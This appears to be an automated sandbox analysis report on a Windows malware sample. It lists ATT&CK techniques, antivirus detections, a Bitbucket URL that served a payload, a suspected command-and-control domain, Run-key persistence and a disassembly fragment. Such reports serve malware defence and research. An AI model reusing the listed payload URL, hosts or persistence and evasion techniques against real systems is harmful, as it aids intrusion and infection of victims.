              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0042D862 __lock,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0042D862
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004228FA GetVersionExA,InterlockedExchange,0_2_004228FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: csc.exe, 00000003.00000002.3785994710.000000000505F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              OS Credential Dumping2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)31
              Process Injection
              2
              Obfuscated Files or Information
              Security Account Manager137
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              2
              Software Packing
              NTDS131
              Security Software Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets141
              Virtualization/Sandbox Evasion
              SSHKeylogging3
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials11
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              3XSXmrEOw7.exe29%ReversingLabsWin32.Ransomware.Generic
              3XSXmrEOw7.exe100%AviraTR/Crypt.XPACK.Gen3
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.microsX0%Avira URL Cloudsafe
              https://bbuseruploads.s3.amazonaws0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              3.5.28.146
              truefalse
                high
                bitbucket.org
                185.166.143.50
                truefalse
                  high
                  navegacionseguracol24vip.org
                  181.131.217.244
                  truefalse
                    unknown
                    s-part-0035.t-0009.t-msedge.net
                    13.107.246.63
                    truefalse
                      high
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://bitbucket.org/facturacioncol/fact/downloads/null.exefalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://bbuseruploads.s3.amazonaws.comcsc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000006D75000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/14436606/23354csc.exe, 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netJcsc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://bitbucket.orgcsc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://web-security-reports.services.atlassian.com/csp-report/bb-websitecsc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/mgravell/protobuf-netcsc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://dz8aopenkvv6s.cloudfront.netcsc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/mgravell/protobuf-neticsc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://remote-app-switcher.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://stackoverflow.com/q/11564914/23354;csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://stackoverflow.com/q/2152978/23354csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bbuseruploads.s3.amazonawscsc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdn.cookielaw.org/csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://aui-cdn.atlassian.com/csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.microsXcsc.exe, 00000003.00000002.3789805471.000000000986D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.microsoft.c3XSXmrEOw7.exefalse
                                                                      high
                                                                      http://s3-w.us-east-1.amazonaws.comcsc.exe, 00000003.00000002.3786417817.0000000007077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.000000000707E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://bitbucket.orgcsc.exe, 00000003.00000002.3786417817.000000000701D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://bbuseruploads.s3.amazonaws.comcsc.exe, 00000003.00000002.3786417817.0000000007077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              181.131.217.244
                                                                              navegacionseguracol24vip.orgColombia
                                                                              13489EPMTelecomunicacionesSAESPCOfalse
                                                                              185.166.143.50
                                                                              bitbucket.orgGermany
                                                                              16509AMAZON-02USfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1573895
                                                                              Start date and time:2024-12-12 17:29:16 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 10m 14s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:7
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:3XSXmrEOw7.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
                                                                              Detection:MAL
                                                                              Classification:mal96.evad.winEXE@3/1@3/2
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 76%
                                                                              • Number of executed functions: 202
                                                                              • Number of non-executed functions: 122
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • VT rate limit hit for: 3XSXmrEOw7.exe
                                                                              TimeTypeDescription
                                                                              11:30:35API Interceptor9585273x Sleep call for process: csc.exe modified
                                                                              17:30:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
                                                                              17:30:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              181.131.217.244pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                  hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                    SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                      QU4rXM7CiL.exeGet hashmaliciousRemcosBrowse
                                                                                        4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                                          nlfb.exeGet hashmaliciousUnknownBrowse
                                                                                            nlfb.exeGet hashmaliciousUnknownBrowse
                                                                                              qtIh.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                KWAo.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                  185.166.143.50pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                    https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                      lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                                                          9QwZPBACyK.exeGet hashmaliciousUnknownBrowse
                                                                                                            PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              jW3NEKvxH1.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                                  yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                                    lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      navegacionseguracol24vip.orgpPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 181.131.217.244
                                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 181.131.217.244
                                                                                                                      s3-w.us-east-1.amazonaws.comfinancial_policy_December 10, 2024.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                      • 54.231.205.1
                                                                                                                      https://login.hr-internal.co/27553be9ed867726?l=50Get hashmaliciousUnknownBrowse
                                                                                                                      • 3.5.28.204
                                                                                                                      http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                                                                                                      • 16.15.193.78
                                                                                                                      https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 54.231.165.145
                                                                                                                      https://auth.ball.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 16.182.101.169
                                                                                                                      https://businessnotice.org/dhl/22450156620/tracking?u=84775-c0bf6be57168918ea5fe039631be6c3a772f4fac11292328fca4a210ba0e8890Get hashmaliciousUnknownBrowse
                                                                                                                      • 52.217.98.132
                                                                                                                      https://quiet-sun-5d9f.atmos4.workers.dev/loginGet hashmaliciousUnknownBrowse
                                                                                                                      • 3.5.23.166
                                                                                                                      https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54Get hashmaliciousPhisherBrowse
                                                                                                                      • 54.231.225.9
                                                                                                                      W-2Updated.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                      • 54.231.134.177
                                                                                                                      YWFMFVCSun.batGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                      • 54.231.229.209
                                                                                                                      s-part-0035.t-0009.t-msedge.netpPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      GvVRQsUM7a.exeGet hashmaliciousDarkTortilla, RemcosBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      ICK6LzM018.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      bitbucket.orgpPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.49
                                                                                                                      https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      9QwZPBACyK.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      YWFMFVCSun.batGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                      • 185.166.143.48
                                                                                                                      jW3NEKvxH1.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      EPMTelecomunicacionesSAESPCOpPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 181.131.217.244
                                                                                                                      s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                      • 181.131.217.244
                                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 181.131.217.244
                                                                                                                      SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 181.131.217.244
                                                                                                                      QU4rXM7CiL.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 181.131.217.244
                                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 191.98.81.24
                                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 190.29.49.250
                                                                                                                      Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 181.138.92.50
                                                                                                                      Josho.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 190.70.10.221
                                                                                                                      la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 181.139.135.210
                                                                                                                      AMAZON-02USpPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.49
                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 18.238.49.124
                                                                                                                      file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                      • 45.112.123.126
                                                                                                                      jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 52.30.223.81
                                                                                                                      7299_output.vbsGet hashmaliciousUnknownBrowse
                                                                                                                      • 3.78.28.71
                                                                                                                      7166_output.vbsGet hashmaliciousAsyncRATBrowse
                                                                                                                      • 18.197.239.5
                                                                                                                      phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                      • 52.219.193.160
                                                                                                                      2.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 54.126.45.88
                                                                                                                      http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                      • 52.49.166.168
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0epPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onionGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      questionable.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      3jr0P5izLl.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      No context
                                                                                                                      Process:C:\Users\user\Desktop\3XSXmrEOw7.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):979567344
                                                                                                                      Entropy (8bit):0.03700901017287011
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:
                                                                                                                      MD5:B3CAB76A555DCC61A1FC843C15FB855B
                                                                                                                      SHA1:F83C46C8C39716DA7235DFFDD37E146A8F3F641E
                                                                                                                      SHA-256:83C5993B56589CA2AE0B06B6F145110E36FC4406AF9CFB8ED23493175BE5467C
                                                                                                                      SHA-512:85CB1F9A0B932E0E4F27FD8E8F2BBA145ACB357516B7A49DCEE8F021D0FBC6B4590BB141CA2849DE15481B1DDB147C2192B57A448AEC32EC9F56D16D1A334A5A
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A..j...9...9...9...9...9...9...9...9...9..9...9...9...9...9...9...9..9...9...9...9<..9...9j..9..9...9...9...9Rich...9................PE..L.....C.................P...`#.....}V.......`....@..........................p*.............................................t........0...="..........................f..................................H............`...............................text....C.......P.................. ..`.rdata.......`.......`..............@..@.data........@...@...@..............@....rsrc....="..0...@".................@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.482858818003191
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:3XSXmrEOw7.exe
                                                                                                                      File size:2'605'056 bytes
                                                                                                                      MD5:ddce3b9704d1e4236548b1a458317dd0
                                                                                                                      SHA1:a48a65dbcba5a65d89688e1b4eac0deef65928c8
                                                                                                                      SHA256:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
                                                                                                                      SHA512:5e99897810377570cc29f0a066d4f31e05790b10d8a479dd8e358477cc7317bccd4d67c5936edfdca5f6385bd0587ba43b626bfc919cb12330facf3fa8893e86
                                                                                                                      SSDEEP:49152:WWp/hOxsZI6ezrykdIyfQxPhPR+Wa0WY44:bp/3p8r3fQBhPR+WJl
                                                                                                                      TLSH:5FC54992A2E9C256F5F26A70D932E6F18526BCA5E935850F63D07D1F3431E818932B33
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A..j...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9<..9...9j..9...9...9...9...9Rich...9.......
                                                                                                                      Icon Hash:83b73111292d65c5
                                                                                                                      Entrypoint:0x42567d
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x43A9E2E6 [Wed Dec 21 23:19:02 2005 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:1b45e9b30691181342689639e3f2a9ef
                                                                                                                      Instruction
                                                                                                                      push 00000060h
                                                                                                                      push 0044C9D0h
                                                                                                                      inc eax
                                                                                                                      inc ebx
                                                                                                                      mov eax, 00000000h
                                                                                                                      inc eax
                                                                                                                      add eax, ebx
                                                                                                                      mov eax, edi
                                                                                                                      call 00007F747CDCA744h
                                                                                                                      mov dword ptr [ebp-18h], esp
                                                                                                                      mov esi, esp
                                                                                                                      mov dword ptr [esi], edi
                                                                                                                      push esi
                                                                                                                      call dword ptr [004462D4h]
                                                                                                                      mov ecx, dword ptr [esi+10h]
                                                                                                                      mov dword ptr [00480954h], ecx
                                                                                                                      mov eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [00480960h], eax
                                                                                                                      mov edx, dword ptr [esi+08h]
                                                                                                                      mov dword ptr [00480964h], edx
                                                                                                                      mov esi, dword ptr [esi+0Ch]
                                                                                                                      and esi, 00007FFFh
                                                                                                                      mov dword ptr [00480958h], esi
                                                                                                                      cmp ecx, 02h
                                                                                                                      je 00007F747CDEC2DEh
                                                                                                                      or esi, 00008000h
                                                                                                                      mov dword ptr [00480958h], esi
                                                                                                                      shl eax, 08h
                                                                                                                      add eax, edx
                                                                                                                      mov dword ptr [0048095Ch], eax
                                                                                                                      xor esi, esi
                                                                                                                      push esi
                                                                                                                      mov edi, dword ptr [00446338h]
                                                                                                                      call 00007F747CDEDAEFh
                                                                                                                      dec ebp
                                                                                                                      pop edx
                                                                                                                      jne 00007F747CDEC2F1h
